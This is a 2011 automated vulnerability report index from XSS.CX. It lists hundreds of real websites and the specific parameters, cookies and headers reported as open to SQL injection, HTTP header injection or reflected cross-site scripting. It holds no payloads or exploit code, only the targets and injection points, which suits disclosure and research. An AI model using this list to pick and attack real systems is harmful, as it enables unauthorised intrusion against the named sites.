Morning DORK Report, XSS, SQL Injection, Cross Site Scripting, HTTP Header Injection, CWE-79, CWE-89, CWE-113

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX Research Blog at Tue Mar 01 09:24:04 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 1]

1.2. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 2]

1.3. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 3]

1.4. http://bad-behavior.ioerror.us/blog/ [REST URL parameter 1]

1.5. http://bad-behavior.ioerror.us/category/bad-behavior/ [REST URL parameter 2]

1.6. http://bad-behavior.ioerror.us/category/bad-behavior/ [name of an arbitrarily supplied request parameter]

1.7. http://bad-behavior.ioerror.us/feed/ [name of an arbitrarily supplied request parameter]

1.8. http://bad-behavior.ioerror.us/feed/atom/ [name of an arbitrarily supplied request parameter]

1.9. https://client.trafficshaping.com/_mint/ [User-Agent HTTP header]

1.10. http://duckduckgo.com/ie/v1/api/oembed [urls parameter]

1.11. http://googleads.g.doubleclick.net/pagead/ads [ga_vid parameter]

1.12. http://googleads.g.doubleclick.net/pagead/ads [u_w parameter]

1.13. http://o.aolcdn.com/os_merge/ [file parameter]

1.14. http://peoplepond.com/_mint/ [MintUnique cookie]

1.15. http://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]

1.16. http://shop.winamp.com/store [JSESSIONID cookie]

1.17. http://shop.winamp.com/store [Locale parameter]

1.18. http://shop.winamp.com/store [Referer HTTP header]

1.19. http://shop.winamp.com/store [ThemeID parameter]

1.20. http://shop.winamp.com/store [name of an arbitrarily supplied request parameter]

1.21. http://shop.winamp.com/store [productID parameter]

1.22. http://shop.winamp.com/store [s_pers cookie]

1.23. http://shop.winamp.com/store [s_sess cookie]

1.24. https://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]

1.25. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/QsQtRaU6mGT.css [REST URL parameter 4]

1.26. http://www.capgemini.com/insights-and-resources/ [name of an arbitrarily supplied request parameter]

1.27. http://www.companypond.com/ [name of an arbitrarily supplied request parameter]

1.28. http://www.dreamhost.com/r.cgi [129733 parameter]

1.29. http://www.dreamhost.com/r.cgi [name of an arbitrarily supplied request parameter]

1.30. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]

1.31. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]

1.32. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]

2. HTTP header injection

2.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [REST URL parameter 1]

2.2. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B4924654.4 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B5077405.10 [REST URL parameter 1]

2.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

2.5. https://duckduckgo.com/html/ [q parameter]

2.6. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Site2pstoreToken parameter]

2.7. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

2.8. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

2.9. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]

2.10. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]

2.11. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]

3. Cross-site scripting (reflected)

3.1. https://accounts.zoho.com/login [serviceurl parameter]

3.2. https://accounts.zoho.com/login [serviceurl parameter]

3.3. https://accounts.zoho.com/register [serviceurl parameter]

3.4. https://accounts.zoho.com/register [serviceurl parameter]

3.5. https://accounts.zoho.com/register [serviceurl parameter]

3.6. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

3.7. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

3.8. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

3.9. http://alterianwaserver.alterianconnect.net/tracking.aspx/gettoken/ [callback parameter]

3.10. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitevents/ [callback parameter]

3.11. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitsession/ [callback parameter]

3.12. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpt parameter]

3.13. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpvc parameter]

3.14. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [name of an arbitrarily supplied request parameter]

3.15. http://api-public.addthis.com/url/shares.json [callback parameter]

3.16. http://api.postup.com/TCTUL001/twidget/1.jsonp [jsonp parameter]

3.17. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]

3.18. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.19. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.20. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.21. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.22. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.23. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.24. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.25. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.26. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [BnId parameter]

3.27. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 10]

3.28. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 11]

3.29. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 12]

3.30. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 13]

3.31. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 14]

3.32. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 15]

3.33. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 4]

3.34. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 5]

3.35. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 6]

3.36. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 7]

3.37. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 8]

3.38. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 9]

3.39. https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start [name of an arbitrarily supplied request parameter]

3.40. https://client.trafficshaping.com/signin [email parameter]

3.41. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]

3.42. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]

3.43. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 4]

3.44. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

3.45. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

3.46. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]

3.47. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]

3.48. http://ds.addthis.com/red/psi/sites/www.capgemini.com/p.json [callback parameter]

3.49. http://ds.addthis.com/red/psi/sites/www.virtusa.com/p.json [callback parameter]

3.50. http://duck.co/ [name of an arbitrarily supplied request parameter]

3.51. http://duck.co/duckduckgo-forum [name of an arbitrarily supplied request parameter]

3.52. http://duck.co/topic/2-25-news-stories-to-comment-on [name of an arbitrarily supplied request parameter]

3.53. http://duck.co/topic/2-28-articles-to-comment-on [name of an arbitrarily supplied request parameter]

3.54. http://duck.co/topic/about-com-s-web-search-readers-choice-awards [name of an arbitrarily supplied request parameter]

3.55. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query [name of an arbitrarily supplied request parameter]

3.56. http://duck.co/topic/cached-archived-links [name of an arbitrarily supplied request parameter]

3.57. http://duck.co/topic/changing-font-text-and-links [name of an arbitrarily supplied request parameter]

3.58. http://duck.co/topic/ddg-gg [name of an arbitrarily supplied request parameter]

3.59. http://duck.co/topic/ddg-in-alternative-web-browsers [name of an arbitrarily supplied request parameter]

3.60. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers [name of an arbitrarily supplied request parameter]

3.61. http://duck.co/topic/ddg-own-search-engine [name of an arbitrarily supplied request parameter]

3.62. http://duck.co/topic/ddg-userbar-to-spread-the-word [name of an arbitrarily supplied request parameter]

3.63. http://duck.co/topic/default-header-color [name of an arbitrarily supplied request parameter]

3.64. http://duck.co/topic/differentiate-duckduckgo-with-other [name of an arbitrarily supplied request parameter]

3.65. http://duck.co/topic/duckduckgo-webs-com-custom-logos [name of an arbitrarily supplied request parameter]

3.66. http://duck.co/topic/foss-donation-nominations [name of an arbitrarily supplied request parameter]

3.67. http://duck.co/topic/freenet [name of an arbitrarily supplied request parameter]

3.68. http://duck.co/topic/historical-traffic-stats [name of an arbitrarily supplied request parameter]

3.69. http://duck.co/topic/how-to-get-similar-growth-for-2011 [name of an arbitrarily supplied request parameter]

3.70. http://duck.co/topic/i-did-my-own-way-to-promote-ddg [name of an arbitrarily supplied request parameter]

3.71. http://duck.co/topic/i-would-love-it-iff-i-need-ideas-fast-please-click [name of an arbitrarily supplied request parameter]

3.72. http://duck.co/topic/logging-in-message-email-not-confirmed [name of an arbitrarily supplied request parameter]

3.73. http://duck.co/topic/maps [name of an arbitrarily supplied request parameter]

3.74. http://duck.co/topic/opera-thread-include-duckduckgo-in-default-search-engines [name of an arbitrarily supplied request parameter]

3.75. http://duck.co/topic/pages-without-favicon-uses-ddg-favicon [name of an arbitrarily supplied request parameter]

3.76. http://duck.co/topic/post-your-ddg-sticker-photos [name of an arbitrarily supplied request parameter]

3.77. http://duck.co/topic/q-html-entities [name of an arbitrarily supplied request parameter]

3.78. http://duck.co/topic/searching-for-roommates-on-craigslist [name of an arbitrarily supplied request parameter]

3.79. http://duck.co/topic/spam-site-found [name of an arbitrarily supplied request parameter]

3.80. http://duck.co/topic/userscript-which-prevents-you-from-accidentally-posting-as-guest [name of an arbitrarily supplied request parameter]

3.81. http://duck.co/topic/want-more-visitors-ehh-needs-to-look-more-proffesional [name of an arbitrarily supplied request parameter]

3.82. http://duck.co/topic/words-to-live-by [name of an arbitrarily supplied request parameter]

3.83. http://duck.co/topic/wot-highlighting [name of an arbitrarily supplied request parameter]

3.84. http://duckduckgo.com/d.js [s parameter]

3.85. http://duckduckgo.com/ie/v1/api/oembed [callback parameter]

3.86. http://duckduckgo.com/ie/v1/api/oembed [maxwidth parameter]

3.87. http://duckduckgo.com/ie/v1/api/oembed [urls parameter]

3.88. http://duckduckgo.com/iq/v1/twitter/cloudscan/services.json [callback parameter]

3.89. http://duckduckgo.com/iq/v1/twitter/cloudscan/services.json [request_id parameter]

3.90. https://duckduckgo.com/e.js [go parameter]

3.91. https://event.on24.com/eventRegistration/EventLobbyServlet [key parameter]

3.92. https://event.on24.com/eventRegistration/EventLobbyServlet [partnerref parameter]

3.93. https://event.on24.com/eventRegistration/EventLobbyServlet [sourcepage parameter]

3.94. http://fonts.googleapis.com/css [family parameter]

3.95. http://init.zopim.com/register [mID parameter]

3.96. http://klout.com/ [name of an arbitrarily supplied request parameter]

3.97. http://klout.com/business [name of an arbitrarily supplied request parameter]

3.98. http://klout.com/perks [name of an arbitrarily supplied request parameter]

3.99. http://lfov.net/webrecorder/g/chimera.js [vid parameter]

3.100. https://login.silverlight.net/login/signin.aspx [returnurl parameter]

3.101. https://login.silverlight.net/login/signin.aspx [returnurl parameter]

3.102. http://odb.outbrain.com/utils/get [callback parameter]

3.103. http://plancast.com/p/3zbp [REST URL parameter 2]

3.104. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

3.105. http://rapportive.com/stylesheets/jquery.fancybox-1.3.1.css [REST URL parameter 2]

3.106. http://rapportive.com/stylesheets/website_screen.css [REST URL parameter 2]

3.107. https://shop.winamp.com/DRHM/store [name of an arbitrarily supplied request parameter]

3.108. https://shop.winamp.com/store [name of an arbitrarily supplied request parameter]

3.109. https://sso.springsource.com/cas/CSS/style-local.css [name of an arbitrarily supplied request parameter]

3.110. https://sso.springsource.com/cas/login [name of an arbitrarily supplied request parameter]

3.111. http://storify.com/klout/contest-winners-how-do-you-use-your-klout-for-good.json [callback parameter]

3.112. http://storify.com/klout/contest-winners-how-do-you-use-your-klout-for-good/record/view [callback parameter]

3.113. http://REDACTED/CNT/iview/302784236/direct [name of an arbitrarily supplied request parameter]

3.114. http://widgets.digg.com/buttons/count [url parameter]

3.115. http://www.business-software.com/top-10-web-content-management-vendors.php [gclid parameter]

3.116. http://www.business-software.com/top-10-web-content-management-vendors.php [keyword parameter]

3.117. http://www.business-software.com/top-10-web-content-management-vendors.php [name of an arbitrarily supplied request parameter]

3.118. http://www.business-software.com/top-10-web-content-management-vendors.php [track parameter]

3.119. http://www.business-software.com/top-10-web-content-management-vendors.php [traffic parameter]

3.120. http://www.linkedin.com/cws/share-count [url parameter]

3.121. http://www.montrealkiosk.com/directory.php [categoryId parameter]

3.122. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 1]

3.123. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 1]

3.124. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 2]

3.125. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 2]

3.126. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 3]

3.127. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 3]

3.128. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

3.129. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

3.130. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

3.131. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

3.132. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

3.133. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

3.134. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

3.135. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

3.136. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

3.137. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

3.138. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

3.139. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

3.140. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

3.141. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

3.142. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

3.143. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

3.144. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

3.145. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

3.146. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

3.147. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

3.148. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

3.149. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

3.150. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

3.151. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

3.152. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

3.153. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

3.154. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

3.155. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

3.156. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

3.157. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

3.158. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

3.159. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

3.160. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

3.161. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

3.162. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

3.163. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

3.164. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

3.165. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

3.166. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

3.167. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

3.168. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

3.169. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

3.170. http://www.opengroup.org/favicon.ico [REST URL parameter 1]

3.171. http://www.opengroup.org/favicon.ico [REST URL parameter 1]

3.172. http://www.opengroup.org/member/ [REST URL parameter 1]

3.173. http://www.opengroup.org/member/ [REST URL parameter 1]

3.174. http://www.opengroup.org/member/ [REST URL parameter 1]

3.175. http://www.opengroup.org/togaf/ [REST URL parameter 1]

3.176. http://www.opengroup.org/togaf/ [REST URL parameter 1]

3.177. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

3.178. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

3.179. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

3.180. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

3.181. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

3.182. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

3.183. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [bean parameter]

3.184. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [method parameter]

3.185. http://www.prchecker.info/check_page_rank.php [name of an arbitrarily supplied request parameter]

3.186. http://www.prchecker.info/check_page_rank.php [urlo parameter]

3.187. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]

3.188. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]

3.189. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]

3.190. http://www.virtusa.com/applications/userlogin/userlogin.asp [fn parameter]

3.191. http://www.virtusa.com/common/exitpage.asp [page parameter]

3.192. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 3]

3.193. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 3]

3.194. http://www.watchmouse.com/en/ [REST URL parameter 1]

3.195. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]

3.196. http://www.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 3]

3.197. http://www.winamp.com/media-player/en [REST URL parameter 2]

3.198. http://www.wolframalpha.com/input/ [i parameter]

3.199. http://www.wolframalpha.com/input/ [name of an arbitrarily supplied request parameter]

3.200. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ck parameter]

3.201. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cm parameter]

3.202. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cmp parameter]

3.203. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cr parameter]

3.204. https://www14.software.ibm.com/webapp/iwm/web/signup.do [csr parameter]

3.205. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ct parameter]

3.206. https://www14.software.ibm.com/webapp/iwm/web/signup.do [mkwid parameter]

3.207. https://www14.software.ibm.com/webapp/iwm/web/signup.do [name of an arbitrarily supplied request parameter]

3.208. http://duckduckgo.com/ [Referer HTTP header]

3.209. http://duckduckgo.com/Assan_language [Referer HTTP header]

3.210. http://duckduckgo.com/Cross-site_scripting [Referer HTTP header]

3.211. http://duckduckgo.com/HTTP_referrer [Referer HTTP header]

3.212. http://duckduckgo.com/Microsoft_Visual_Studio [Referer HTTP header]

3.213. http://duckduckgo.com/NaN [Referer HTTP header]

3.214. http://duckduckgo.com/User_agent [Referer HTTP header]

3.215. http://duckduckgo.com/c/Computer_arithmetic [Referer HTTP header]

3.216. http://duckduckgo.com/c/Computing_acronyms [Referer HTTP header]

3.217. http://duckduckgo.com/c/Software_anomalies [Referer HTTP header]

3.218. http://duckduckgo.com/c/The_Simpsons_characters [Referer HTTP header]

3.219. http://duckduckgo.com/e.js [Referer HTTP header]

3.220. https://duckduckgo.com/ [Referer HTTP header]

3.221. https://duckduckgo.com/Electronic_Frontier_Foundation [Referer HTTP header]

3.222. https://duckduckgo.com/HTTP_Secure [Referer HTTP header]

3.223. https://duckduckgo.com/HTTP_cookie [Referer HTTP header]

3.224. https://duckduckgo.com/IP_Address [Referer HTTP header]

3.225. https://duckduckgo.com/e.js [Referer HTTP header]

3.226. https://duckduckgo.com/e.js [Referer HTTP header]

3.227. https://event.on24.com/eventRegistration/EventLobbyServlet [User-Agent HTTP header]

3.228. https://login.oracle.com/mysso/signon.jsp [Referer HTTP header]

3.229. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Referer HTTP header]

3.230. http://telligent.com/products/request_a_demo.aspx [Referer HTTP header]

3.231. http://telligent.com/resources/m/analysts/1343205.aspx [Referer HTTP header]

3.232. http://telligent.com/resources/m/analysts/1345217.aspx [Referer HTTP header]

3.233. http://telligent.com/resources/m/success_stories/1331597.aspx [Referer HTTP header]

3.234. http://telligent.com/support/request_an_upgrade/ [Referer HTTP header]

3.235. http://www.fusionbot.com/ [Referer HTTP header]

3.236. http://www.virtusa.com/contactus [Referer HTTP header]

3.237. http://www.virtusa.com/contactus/ [Referer HTTP header]

3.238. http://www.virtusa.com/ftbu/contactus/default.asp [Referer HTTP header]

3.239. http://www.watchmouse.com/en/ [Referer HTTP header]

3.240. https://accounts.zoho.com/login [iamcsr cookie]

3.241. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

3.242. http://duck.co/duckduckgo-forum [zdccn cookie]

3.243. http://duck.co/duckduckgo-forum [zdccn cookie]

3.244. http://duck.co/portalLogin.do [zdccn cookie]

3.245. http://duck.co/topic/2-25-news-stories-to-comment-on [zdccn cookie]

3.246. http://duck.co/topic/2-25-news-stories-to-comment-on [zdccn cookie]

3.247. http://duck.co/topic/2-28-articles-to-comment-on [zdccn cookie]

3.248. http://duck.co/topic/2-28-articles-to-comment-on [zdccn cookie]

3.249. http://duck.co/topic/about-com-s-web-search-readers-choice-awards [zdccn cookie]

3.250. http://duck.co/topic/about-com-s-web-search-readers-choice-awards [zdccn cookie]

3.251. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query [zdccn cookie]

3.252. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query [zdccn cookie]

3.253. http://duck.co/topic/cached-archived-links [zdccn cookie]

3.254. http://duck.co/topic/cached-archived-links [zdccn cookie]

3.255. http://duck.co/topic/changing-font-text-and-links [zdccn cookie]

3.256. http://duck.co/topic/changing-font-text-and-links [zdccn cookie]

3.257. http://duck.co/topic/ddg-gg [zdccn cookie]

3.258. http://duck.co/topic/ddg-gg [zdccn cookie]

3.259. http://duck.co/topic/ddg-in-alternative-web-browsers [zdccn cookie]

3.260. http://duck.co/topic/ddg-in-alternative-web-browsers [zdccn cookie]

3.261. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers [zdccn cookie]

3.262. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers [zdccn cookie]

3.263. http://duck.co/topic/ddg-own-search-engine [zdccn cookie]

3.264. http://duck.co/topic/ddg-own-search-engine [zdccn cookie]

3.265. http://duck.co/topic/ddg-userbar-to-spread-the-word [zdccn cookie]

3.266. http://duck.co/topic/ddg-userbar-to-spread-the-word [zdccn cookie]

3.267. http://duck.co/topic/default-header-color [zdccn cookie]

3.268. http://duck.co/topic/default-header-color [zdccn cookie]

3.269. http://duck.co/topic/differentiate-duckduckgo-with-other [zdccn cookie]

3.270. http://duck.co/topic/differentiate-duckduckgo-with-other [zdccn cookie]

3.271. http://duck.co/topic/duckduckgo-webs-com-custom-logos [zdccn cookie]

3.272. http://duck.co/topic/duckduckgo-webs-com-custom-logos [zdccn cookie]

3.273. http://duck.co/topic/foss-donation-nominations [zdccn cookie]

3.274. http://duck.co/topic/foss-donation-nominations [zdccn cookie]

3.275. http://duck.co/topic/freenet [zdccn cookie]

3.276. http://duck.co/topic/freenet [zdccn cookie]

3.277. http://duck.co/topic/historical-traffic-stats [zdccn cookie]

